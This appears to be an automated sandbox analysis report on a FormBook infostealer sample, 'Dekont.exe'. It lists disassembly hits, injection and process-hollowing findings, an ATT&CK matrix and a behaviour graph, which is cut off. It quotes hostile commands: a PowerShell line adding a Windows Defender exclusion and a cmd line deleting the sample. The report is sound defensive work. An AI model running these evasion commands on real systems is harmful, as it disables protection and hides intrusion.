          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FD8AA0 mov eax, dword ptr fs:[00000030h]5_2_00FD8AA0
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FD8AA0 mov eax, dword ptr fs:[00000030h]5_2_00FD8AA0
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FDEA80 mov eax, dword ptr fs:[00000030h]5_2_00FDEA80
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FDEA80 mov eax, dword ptr fs:[00000030h]5_2_00FDEA80
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FDEA80 mov eax, dword ptr fs:[00000030h]5_2_00FDEA80
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FDEA80 mov eax, dword ptr fs:[00000030h]5_2_00FDEA80
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FDEA80 mov eax, dword ptr fs:[00000030h]5_2_00FDEA80
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FDEA80 mov eax, dword ptr fs:[00000030h]5_2_00FDEA80
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FDEA80 mov eax, dword ptr fs:[00000030h]5_2_00FDEA80
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FDEA80 mov eax, dword ptr fs:[00000030h]5_2_00FDEA80
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FDEA80 mov eax, dword ptr fs:[00000030h]5_2_00FDEA80
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FE0A5B mov eax, dword ptr fs:[00000030h]5_2_00FE0A5B
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FE0A5B mov eax, dword ptr fs:[00000030h]5_2_00FE0A5B
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FD6A50 mov eax, dword ptr fs:[00000030h]5_2_00FD6A50
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FD6A50 mov eax, dword ptr fs:[00000030h]5_2_00FD6A50
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FD6A50 mov eax, dword ptr fs:[00000030h]5_2_00FD6A50
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FD6A50 mov eax, dword ptr fs:[00000030h]5_2_00FD6A50
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FD6A50 mov eax, dword ptr fs:[00000030h]5_2_00FD6A50
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FD6A50 mov eax, dword ptr fs:[00000030h]5_2_00FD6A50
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FD6A50 mov eax, dword ptr fs:[00000030h]5_2_00FD6A50
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_01084BB0 mov eax, dword ptr fs:[00000030h]5_2_01084BB0
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_01084BB0 mov eax, dword ptr fs:[00000030h]5_2_01084BB0
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FF4A35 mov eax, dword ptr fs:[00000030h]5_2_00FF4A35
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FF4A35 mov eax, dword ptr fs:[00000030h]5_2_00FF4A35
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FFEA2E mov eax, dword ptr fs:[00000030h]5_2_00FFEA2E
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_0107EBD0 mov eax, dword ptr fs:[00000030h]5_2_0107EBD0
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_0105CBF0 mov eax, dword ptr fs:[00000030h]5_2_0105CBF0
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FFEBFC mov eax, dword ptr fs:[00000030h]5_2_00FFEBFC
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FD8BF0 mov eax, dword ptr fs:[00000030h]5_2_00FD8BF0
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FD8BF0 mov eax, dword ptr fs:[00000030h]5_2_00FD8BF0
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FD8BF0 mov eax, dword ptr fs:[00000030h]5_2_00FD8BF0
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_0105CA11 mov eax, dword ptr fs:[00000030h]5_2_0105CA11
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_0100CA24 mov eax, dword ptr fs:[00000030h]5_2_0100CA24
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FD0BCD mov eax, dword ptr fs:[00000030h]5_2_00FD0BCD
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FD0BCD mov eax, dword ptr fs:[00000030h]5_2_00FD0BCD
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FD0BCD mov eax, dword ptr fs:[00000030h]5_2_00FD0BCD
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FF0BCB mov eax, dword ptr fs:[00000030h]5_2_00FF0BCB
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FF0BCB mov eax, dword ptr fs:[00000030h]5_2_00FF0BCB
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FF0BCB mov eax, dword ptr fs:[00000030h]5_2_00FF0BCB
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_0100CA38 mov eax, dword ptr fs:[00000030h]5_2_0100CA38
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FE0BBE mov eax, dword ptr fs:[00000030h]5_2_00FE0BBE
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FE0BBE mov eax, dword ptr fs:[00000030h]5_2_00FE0BBE
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_0107EA60 mov eax, dword ptr fs:[00000030h]5_2_0107EA60
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_0100CA6F mov eax, dword ptr fs:[00000030h]5_2_0100CA6F
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_0100CA6F mov eax, dword ptr fs:[00000030h]5_2_0100CA6F
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_0100CA6F mov eax, dword ptr fs:[00000030h]5_2_0100CA6F
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_0104CA72 mov eax, dword ptr fs:[00000030h]5_2_0104CA72
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_0104CA72 mov eax, dword ptr fs:[00000030h]5_2_0104CA72
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FCCB7E mov eax, dword ptr fs:[00000030h]5_2_00FCCB7E
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_010A4A80 mov eax, dword ptr fs:[00000030h]5_2_010A4A80
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_01008A90 mov edx, dword ptr fs:[00000030h]5_2_01008A90
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_01026AA4 mov eax, dword ptr fs:[00000030h]5_2_01026AA4
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_01026ACC mov eax, dword ptr fs:[00000030h]5_2_01026ACC
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_01026ACC mov eax, dword ptr fs:[00000030h]5_2_01026ACC
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_01026ACC mov eax, dword ptr fs:[00000030h]5_2_01026ACC
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_01004AD0 mov eax, dword ptr fs:[00000030h]5_2_01004AD0
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_01004AD0 mov eax, dword ptr fs:[00000030h]5_2_01004AD0
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FFEB20 mov eax, dword ptr fs:[00000030h]5_2_00FFEB20
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FFEB20 mov eax, dword ptr fs:[00000030h]5_2_00FFEB20
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_0100AAEE mov eax, dword ptr fs:[00000030h]5_2_0100AAEE
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_0100AAEE mov eax, dword ptr fs:[00000030h]5_2_0100AAEE
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_01088D10 mov eax, dword ptr fs:[00000030h]5_2_01088D10
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_01088D10 mov eax, dword ptr fs:[00000030h]5_2_01088D10
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_01004D1D mov eax, dword ptr fs:[00000030h]5_2_01004D1D
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_01058D20 mov eax, dword ptr fs:[00000030h]5_2_01058D20
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FCCCC8 mov eax, dword ptr fs:[00000030h]5_2_00FCCCC8
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FF8CB1 mov eax, dword ptr fs:[00000030h]5_2_00FF8CB1
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FF8CB1 mov eax, dword ptr fs:[00000030h]5_2_00FF8CB1
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_01068D6B mov eax, dword ptr fs:[00000030h]5_2_01068D6B
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FC8C8D mov eax, dword ptr fs:[00000030h]5_2_00FC8C8D
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_01006DA0 mov eax, dword ptr fs:[00000030h]5_2_01006DA0
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_01098DAE mov eax, dword ptr fs:[00000030h]5_2_01098DAE
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_008772CE GetProcessHeap,HeapAlloc,GetProcessHeap,8_2_008772CE
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Users\user\Desktop\Dekont.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_008742F0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,8_2_008742F0
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_00874550 SetUnhandledExceptionFilter,8_2_00874550
          Source: C:\Users\user\Desktop\Dekont.exeMemory allocated: page read and write | page guardJump to behavior

          HIPS / PFW / Operating System Protection Evasion

          barindex
          Adds a directory exclusion to Windows Defender
          Source: C:\Users\user\Desktop\Dekont.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Dekont.exe"
          Source: C:\Users\user\Desktop\Dekont.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Dekont.exe"Jump to behavior
          Found direct / indirect Syscall (likely to bypass EDR)
          Source: C:\Users\user\Desktop\Dekont.exeNtClose: Indirect: 0xF5A56C
          Source: C:\Users\user\Desktop\Dekont.exeNtQueueApcThread: Indirect: 0xF5A4F2Jump to behavior
          Maps a DLL or memory area into another process
          Source: C:\Users\user\Desktop\Dekont.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\Desktop\Dekont.exeSection loaded: NULL target: C:\Windows\SysWOW64\control.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\Desktop\Dekont.exeSection loaded: NULL target: C:\Windows\SysWOW64\control.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\control.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: read writeJump to behavior
          Source: C:\Windows\SysWOW64\control.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Modifies the context of a thread in another process (thread injection)
          Source: C:\Users\user\Desktop\Dekont.exeThread register set: target process: 1028Jump to behavior
          Source: C:\Windows\SysWOW64\control.exeThread register set: target process: 1028Jump to behavior
          Queues an APC in another process (thread injection)
          Source: C:\Users\user\Desktop\Dekont.exeThread APC queued: target process: C:\Windows\explorer.exeJump to behavior
          Sample uses process hollowing technique
          Source: C:\Users\user\Desktop\Dekont.exeSection unmapped: C:\Windows\SysWOW64\control.exe base address: 870000Jump to behavior
          Source: C:\Users\user\Desktop\Dekont.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Dekont.exe"Jump to behavior
          Source: C:\Users\user\Desktop\Dekont.exeProcess created: C:\Users\user\Desktop\Dekont.exe "C:\Users\user\Desktop\Dekont.exe"Jump to behavior
          Source: C:\Windows\SysWOW64\control.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\Dekont.exe"Jump to behavior
          Source: explorer.exe, 00000006.00000000.2089618463.0000000009B41000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3854649429.0000000009C21000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4533610517.0000000009C22000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd=
          Source: explorer.exe, 00000006.00000002.4519292982.0000000001731000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000000.2078216308.0000000001731000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program Manager
          Source: explorer.exe, 00000006.00000002.4521804359.0000000004B00000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4519292982.0000000001731000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000000.2078216308.0000000001731000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000006.00000002.4519292982.0000000001731000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000000.2078216308.0000000001731000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000006.00000002.4519292982.0000000001731000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000000.2078216308.0000000001731000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
          Source: explorer.exe, 00000006.00000000.2077619011.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4517983808.0000000000EF0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PProgman
          Source: C:\Users\user\Desktop\Dekont.exeQueries volume information: C:\Users\user\Desktop\Dekont.exe VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Dekont.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Dekont.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Dekont.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Dekont.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Dekont.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Dekont.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Dekont.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_00874775 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,8_2_00874775
          Source: C:\Users\user\Desktop\Dekont.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

          Stealing of Sensitive Information

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 5.2.Dekont.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.Dekont.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000005.00000002.2141729519.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.4518032619.0000000002B30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.4518870753.0000000004A40000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.4518634583.00000000031B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.2071931246.0000000003929000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

          Remote Access Functionality

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 5.2.Dekont.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.Dekont.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000005.00000002.2141729519.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.4518032619.0000000002B30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.4518870753.0000000004A40000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.4518634583.00000000031B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.2071931246.0000000003929000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

          Mitre Att&ck Matrix

          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
          Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
          Shared Modules          		1
          DLL Side-Loading          		412
          Process Injection          		1
          Masquerading          		OS Credential Dumping1
          System Time Discovery          		Remote Services1
          Archive Collected Data          		1
          Encrypted Channel          		Exfiltration Over Other Network MediumAbuse Accessibility Features
          CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
          Abuse Elevation Control Mechanism          		11
          Disable or Modify Tools          		LSASS Memory241
          Security Software Discovery          		Remote Desktop ProtocolData from Removable Media2
          Ingress Tool Transfer          		Exfiltration Over BluetoothNetwork Denial of Service
          Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
          DLL Side-Loading          		41
          Virtualization/Sandbox Evasion          		Security Account Manager2
          Process Discovery          		SMB/Windows Admin SharesData from Network Shared Drive2
          Non-Application Layer Protocol          		Automated ExfiltrationData Encrypted for Impact
          Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook412
          Process Injection          		NTDS41
          Virtualization/Sandbox Evasion          		Distributed Component Object ModelInput Capture12
          Application Layer Protocol          		Traffic DuplicationData Destruction
          Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
          Deobfuscate/Decode Files or Information          		LSA Secrets1
          Application Window Discovery          		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
          Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
          Abuse Elevation Control Mechanism          		Cached Domain Credentials1
          File and Directory Discovery          		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
          DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items4
          Obfuscated Files or Information          		DCSync213
          System Information Discovery          		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
          Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job12
          Software Packing          		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
          Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
          Timestomp          		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
          IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron1
          DLL Side-Loading          		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1517901 Sample: Dekont.exe Startdate: 25/09/2024 Architecture: WINDOWS Score: 100 36 www.nnevateknoloji.xyz 2->36 38 www.y-language-menu.net 2->38 40 9 other IPs or domains 2->40 44 Suricata IDS alerts for network traffic 2->44 46 Found malware configuration 2->46 48 Malicious sample detected (through community Yara rule) 2->48 52 9 other signatures 2->52 11 Dekont.exe 4 2->11         started        signatures3 50 Performs DNS queries to domains with low reputation 36->50 process4 file5 34 C:\Users\user\AppData\...\Dekont.exe.log, ASCII 11->34 dropped 62 Adds a directory exclusion to Windows Defender 11->62 64 Tries to detect virtualization through RDTSC time measurements 11->64 66 Switches to a custom stack to bypass stack traces 11->66 15 Dekont.exe 11->15         started        18 powershell.exe 23 11->18         started        signatures6 process7 signatures8 68 Modifies the context of a thread in another process (thread injection) 15->68 70 Maps a DLL or memory area into another process 15->70 72 Sample uses process hollowing technique 15->72 76 2 other signatures 15->76 20 explorer.exe 99 